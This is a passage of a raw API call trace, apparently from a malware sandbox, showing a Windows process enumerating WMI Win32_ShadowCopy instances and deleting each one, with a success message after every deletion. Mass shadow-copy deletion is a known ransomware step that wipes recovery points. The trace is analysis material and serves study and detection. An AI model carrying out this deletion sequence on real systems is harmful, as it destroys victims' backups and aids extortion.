lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0170.500] malloc (_Size=0x20) returned 0x28dca0 [0170.500] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0170.500] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0170.500] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0170.500] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0170.500] free (_Block=0x28dca0) [0170.500] free (_Block=0x28d490) [0170.500] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0170.502] malloc (_Size=0x18) returned 0x28bfb0 [0170.503] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0170.503] free (_Block=0x28bfb0) [0170.503] malloc (_Size=0x800) returned 0x28d490 [0170.503] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0170.503] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0170.503] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0170.503] malloc (_Size=0x68) returned 0x28dca0 [0170.503] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0170.503] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0170.503] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0170.503] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0170.503] free (_Block=0x28dca0) [0170.503] free (_Block=0x28d490) [0170.503] LocalFree (hMem=0x34c7e0) returned 0x0 [0170.503] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0172.324] IUnknown:Release (This=0x1db3d80) returned 0x0 [0172.324] malloc (_Size=0x800) returned 0x28d490 [0172.324] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0172.324] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0172.324] malloc (_Size=0x20) returned 0x28dca0 [0172.324] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0172.324] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0172.324] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0172.324] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0172.324] free (_Block=0x28dca0) [0172.324] free (_Block=0x28d490) [0172.324] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0173.832] malloc (_Size=0x18) returned 0x28bfb0 [0173.832] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0173.832] free (_Block=0x28bfb0) [0173.832] malloc (_Size=0x800) returned 0x28d490 [0173.833] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0173.833] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0173.833] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0173.833] malloc (_Size=0x68) returned 0x28dca0 [0173.833] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0173.833] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0173.833] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0173.833] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0173.833] free (_Block=0x28dca0) [0173.833] free (_Block=0x28d490) [0173.833] LocalFree (hMem=0x34c7e0) returned 0x0 [0173.833] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0178.180] IUnknown:Release (This=0x1db3d80) returned 0x0 [0178.180] malloc (_Size=0x800) returned 0x28d490 [0178.180] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0178.180] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0178.180] malloc (_Size=0x20) returned 0x28dca0 [0178.180] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0178.180] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0178.180] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0178.180] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0178.180] free (_Block=0x28dca0) [0178.180] free (_Block=0x28d490) [0178.180] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0178.181] malloc (_Size=0x18) returned 0x28bfb0 [0178.181] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0178.181] free (_Block=0x28bfb0) [0178.181] malloc (_Size=0x800) returned 0x28d490 [0178.181] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0178.181] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0178.182] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0178.182] malloc (_Size=0x68) returned 0x3cee90 [0178.182] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x3cee90, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0178.182] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0178.182] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0178.182] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0178.182] free (_Block=0x3cee90) [0178.182] free (_Block=0x28d490) [0178.182] LocalFree (hMem=0x34c7e0) returned 0x0 [0178.182] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0181.190] IUnknown:Release (This=0x1db3d80) returned 0x0 [0181.190] malloc (_Size=0x800) returned 0x28d490 [0181.190] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0181.190] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0181.190] malloc (_Size=0x20) returned 0x28dca0 [0181.190] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0181.190] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0181.190] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0181.190] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0181.190] free (_Block=0x28dca0) [0181.190] free (_Block=0x28d490) [0181.190] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0181.200] malloc (_Size=0x18) returned 0x28bfb0 [0181.200] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0181.200] free (_Block=0x28bfb0) [0181.200] malloc (_Size=0x800) returned 0x28d490 [0181.200] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0181.200] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0181.200] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0181.200] malloc (_Size=0x68) returned 0x28dca0 [0181.200] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0181.200] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0181.200] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0181.200] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0181.200] free (_Block=0x28dca0) [0181.200] free (_Block=0x28d490) [0181.200] LocalFree (hMem=0x34c7e0) returned 0x0 [0181.200] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{DC780020-7243-4B55-80A9-4BA6EE67823B}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0184.727] IUnknown:Release (This=0x1db3d80) returned 0x0 [0184.727] malloc (_Size=0x800) returned 0x28d490 [0184.728] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0184.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0184.728] malloc (_Size=0x20) returned 0x28feb0 [0184.728] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28feb0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0184.728] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0184.728] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0184.728] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0184.728] free (_Block=0x28feb0) [0184.728] free (_Block=0x28d490) [0184.728] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0184.729] malloc (_Size=0x18) returned 0x28bfb0 [0184.729] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0184.729] free (_Block=0x28bfb0) [0184.729] malloc (_Size=0x800) returned 0x28d490 [0184.729] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0184.729] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0184.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0184.729] malloc (_Size=0x68) returned 0x28dca0 [0184.729] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0184.730] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0184.730] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0184.730] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0184.730] free (_Block=0x28dca0) [0184.730] free (_Block=0x28d490) [0184.730] LocalFree (hMem=0x34c7e0) returned 0x0 [0184.730] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0186.103] IUnknown:Release (This=0x1db3d80) returned 0x0 [0186.103] malloc (_Size=0x800) returned 0x28d490 [0186.103] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0186.103] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0186.103] malloc (_Size=0x20) returned 0x28dca0 [0186.103] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0186.103] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0186.103] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0186.103] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0186.103] free (_Block=0x28dca0) [0186.103] free (_Block=0x28d490) [0186.103] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0187.512] malloc (_Size=0x18) returned 0x28bfb0 [0187.512] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0187.512] free (_Block=0x28bfb0) [0187.512] malloc (_Size=0x800) returned 0x28d490 [0187.512] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0187.512] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="쟠4") returned 0x67 [0187.512] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0187.512] malloc (_Size=0x68) returned 0x28dca0 [0187.512] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0187.512] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0187.512] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0187.512] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0187.512] free (_Block=0x28dca0) [0187.512] free (_Block=0x28d490) [0187.513] LocalFree (hMem=0x34c7e0) returned 0x0 [0187.513] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0188.835] IUnknown:Release (This=0x1db3d80) returned 0x0 [0188.835] malloc (_Size=0x800) returned 0x28d490 [0188.835] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0188.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0188.835] malloc (_Size=0x20) returned 0x28dca0 [0188.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0188.835] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0188.836] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0188.836] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0188.836] free (_Block=0x28dca0) [0188.836] free (_Block=0x28d490) [0188.836] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0190.325] malloc (_Size=0x18) returned 0x28bfb0 [0190.325] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 